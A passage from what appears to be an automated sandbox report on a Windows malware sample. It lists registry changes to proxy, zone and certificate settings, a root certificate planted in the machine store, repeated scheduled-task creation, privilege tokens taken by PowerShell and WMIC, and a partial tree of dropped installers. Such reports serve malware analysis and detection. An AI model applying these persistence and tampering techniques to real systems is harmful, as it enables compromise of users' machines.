| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-98-e5-d9-e3-d0\WpadDecisionReason = "1" | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-98-e5-d9-e3-d0\WpadDecisionReason = "1" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4B49A160-E7F5-4B4C-BB1D-8E68CCAB25B1}\WpadDecisionTime = c0949bb66dc3da01 | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-98-e5-d9-e3-d0\WpadDecisionTime = c0949bb66dc3da01 | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00e2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4B49A160-E7F5-4B4C-BB1D-8E68CCAB25B1}\WpadNetworkName = "Network 3" | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-98-e5-d9-e3-d0\WpadDecision = "0" | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft | C:\Windows\SysWOW64\wscript.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4B49A160-E7F5-4B4C-BB1D-8E68CCAB25B1}\WpadDecision = "0" | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-98-e5-d9-e3-d0\WpadDecisionTime = c0949bb66dc3da01 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4B49A160-E7F5-4B4C-BB1D-8E68CCAB25B1}\f6-98-e5-d9-e3-d0 | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-98-e5-d9-e3-d0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\wscript.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00e2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\ZGvPVAg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4B49A160-E7F5-4B4C-BB1D-8E68CCAB25B1}\WpadDecisionReason = "1" | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a00969856dc3da01 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000005f438c6dc3da01 | C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\ZGvPVAg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\ZGvPVAg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\ZGvPVAg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\SysWOW64\wscript.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fa6aa0dd992228ace8364ddfe1df64c539ee82217fe36710e5882f62dc9868d7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000003001\b2c2c1.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fa6aa0dd992228ace8364ddfe1df64c539ee82217fe36710e5882f62dc9868d7.exe
"C:\Users\Admin\AppData\Local\Temp\fa6aa0dd992228ace8364ddfe1df64c539ee82217fe36710e5882f62dc9868d7.exe"
C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe"
C:\Users\Admin\AppData\Local\Temp\1000003001\b2c2c1.exe
"C:\Users\Admin\AppData\Local\Temp\1000003001\b2c2c1.exe"
C:\Users\Admin\AppData\Local\Temp\1000005001\setup.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\setup.exe"
C:\Users\Admin\AppData\Local\Temp\1000006001\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\1000006001\FirstZ.exe"
C:\Users\Admin\AppData\Local\Temp\7zS2971.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS2EBE.tmp\Install.exe
.\Install.exe /bdidq "385119" /S
C:\Users\Admin\AppData\Local\Temp\1000009001\setup.exe
"C:\Users\Admin\AppData\Local\Temp\1000009001\setup.exe"
C:\Users\Admin\AppData\Local\Temp\7zS3997.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS3D20.tmp\Install.exe
.\Install.exe /Rdprdidxe "385134" /S
C:\Windows\SysWOW64\cmd.exe
